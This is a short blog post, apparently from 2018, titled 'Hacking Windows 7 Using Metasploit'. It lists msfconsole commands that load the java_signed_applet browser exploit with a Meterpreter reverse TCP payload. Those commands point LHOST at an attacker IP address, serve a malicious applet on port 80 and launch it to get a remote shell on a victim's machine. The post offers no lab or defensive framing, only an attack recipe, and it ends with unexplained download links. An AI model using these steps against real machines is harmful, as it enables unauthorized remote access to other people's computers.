Monday, February 26, 2018

Hacking Windows 7 Using Metasploit

Hacking Windows 7 Using Metasploit


1. Open terminal, type msfconsole and hit enter. Metsaploit will open like in image.

[Image: Screenshot-2.png]

2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

5. Now type set lport 443 and hit enter.

6. Now type set srvport 80 and hit enter.

7. Now type set uripath JackDaniels and hit enter.(you may change JackDaniels to your disired one)


8. At last type exploit and hit enter. 


go to link download
download

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.